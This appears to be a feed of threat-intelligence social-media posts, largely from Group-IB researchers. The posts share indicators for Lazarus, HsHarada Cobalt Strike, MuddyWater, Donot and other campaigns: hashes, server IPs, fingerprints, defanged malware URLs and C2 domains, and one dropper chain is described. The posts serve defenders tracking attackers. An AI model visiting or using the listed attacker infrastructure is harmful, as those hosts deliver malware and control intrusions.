Rustam Mirkasymov

Cybersecurity is full of exceptional people - and true friends. Don’t miss them while drowning in alerts.

@craiu It was dead. I checked on the day the article went public. Thanks for sharing!

A story in four acts:

MISTPEN 2ff5f461ae6b94b7cae8114c94d55fe3f4f40fc30db82446a62758e532557de7 uploaded from Romania. Can be decrypted by b68a90b703750beaff2869b686c4adddcd47702d6a06b591ee7ac22b67d331b0 #Lazarus #Dreamjob

Good job @rivitna2

@GroupIB_TI #CobaltStrike beacon was deployed via a webshell that was planted by exploiting the #ProxyShell vulnerability. This #HsHarada campaign targets healthcare and healthcare-adjacent organizations, and relies on github.com/Tas9er

New #HsHarada #CobaltStrike server: 103.35.190[.]215. Fully aligns with the heuristic described by us earlier twitter.com/GroupIB_TI/sta…

82.117.254[.]222 hosts a specific #SSL certificate with jarm 2ad2ad16d2ad2ad00042d42d00042ddb04deffa1705e2edc44cae1ed24a4da issued by v5.90.org. Additional #CobaltStrike watermark 391144938 gives confident attribtuion to #HsHarada servers. Old server: 166.1.18[.]197 Alive #HsHarada CS servers: 195.123.242[.]122, 195.123.242[.]143, 195.123.240[.]5 Happy hunting!

@KorbenD_Intel @GroupIB_TI If curl used to exfiltrate data, can it be called malicious?

@GroupIB_TI "legitimate tool" - How legitimate can it really be, if used maliciously? 🤓

The Group-IB’s Threat Intelligence team has discovered a potentially new legitimate tool in the possession of the #MuddyWater group. The files with the SHA1 hashes: 69f68529e07f2463eb105cfc87df04539e969a56 (attachments./zip) and 81c06183b1bb146f5f1a5f1d03ac44fa9d68d341 (defence-video./zip) were uploaded to VirusTotal on October 30, 2023. Inside the archives, there is a directory named "2023", which includes: 1) Shortcut - Attachments.lnk 2) A hidden subdirectory "Document" containing a Decoy document - 84609.pdf or scan.pdf 3) A hidden subdirectory "Windows.Diagnostic.Document" containing Diagnostic.exe and a subdirectory .end with an installer for “N‑able, the advanced monitoring agent utility.” The primary function of the dropper is to execute the installer and open the decoy. According to data from N-able (n-able.com/features/advan…), this utility can remotely interact with the device on which the program was launched. Both archives were distributed through the following links: 1) hxxp://a[.]storyblok[.]com/f/259791/x/91e2f5fa2f/attachments[.]zip 2) hxxps://a[.]storyblok[.]com/f/259837/x/21e6a04837/defense-video[.]zip

While 66% of businesses suspect insider attacks, reality proves different. A recent incident our Responsemen handled had a surprising twist. Watch our comic book and read the full story on our blog: bit.ly/46I0PUb #IncidentResponse #FightCyberCrime #CyberSecurity

Our DFIR team launched their channel and started with perfect case which shows collaboration between @GroupIB_TI and @GroupIB_DFIR . Subscribe to know spicy details of our real life IR cases.

🔍 Further analysis has unearthed 🕳️ more potential infrastructure linked to the same adversary 😈 using a simple pivot from the CobaltStrike IP and SSH Key. What's even more intriguing is that the same SSH key is being used by #Truebot. 🔹88.214.25.242 0/88 VT 🔹5.188.87.37 11/89 VT 🔹45.227.255.34 1/89 VT 🔹45.182.189.118 9/89 VT 🛡️ Stay on your toes and remain vigilant! 🚨 #CyberSecurity #Pikabot 🤖

In the spirit of "this talk could've been a tweet", I just pushed a button: #BinDiff is now open source. - Snapshot release, no major new functionality - Release binaries later today or tomorrow - This is my 20% and I won't we able to act on PRs until end of Q4 (OOO traveling)

The servers don’t host truebot, however CS configs and domain names convention are completely similar to those from the PaperCut related cases.

#APT #Donot XLS: virustotal.com/gui/file/68351… virustotal.com/gui/file/4bd7b… URL: hxxp://thanrole[.]buzz/Ur7AdyiXFB1VNNl8/rHhiHSQwiAkySF9iqJEoCk7SOHz8DHf8zosMprQQOEERSk10.(ico|png|mp3|mp4) Jaca sample: virustotal.com/gui/file/40998… C2: adjusteble[.]info

Group-IB has made a key contribution to the #INTERPOL-led Africa Cyber Surge II operation that spanned 25 countries. Group-IB shared more than 1,000 indicators related to malicious infrastructure across Africa. This successful initiative led to arrests of 14 suspects. More details: bit.ly/45cCmpw @INTERPOL_Cyber #FightAgainsCybercrime

#Gigabud #RAT is out there expanding its capabilities and targets. Our team recently dissected the fraudulent techniques employed by Gigabud’s operators, using the Group-IB Fraud Matrix. The detailed investigation uncovered more than 400 separate Gigabud.RAT samples, and we outline how the #trojan operates, its previously unknown variants, and the potential risks to organizations, particularly across the Asia-Pacific region. Dive into the full investigation here: bitly.ws/S7Ay #FightAgainstCybercrime

More is coming

Global geopolitical conflicts frequently serve as catalysts for #hacktivist activities. In a comprehensive overview, @GroupIB specialists have traced Mysterious Team Bangladesh’s attacks, uncovering their timeline and distribution. Check out or new blog: bitly.ws/PZ4L

Many thanks to everyone who contributed into the investigation and worked with us together (especially @OrangeCertCC and @c_APT_ure) in making the cyberspace safier.

Recently, @WhichbufferArda shared information about #FIN7’s infrastructure that used to deliver POWERTRASH loader and Diceloader. We noticed the unique characteristics of these servers, which allowed us to get additional servers, presumably owned by FIN7.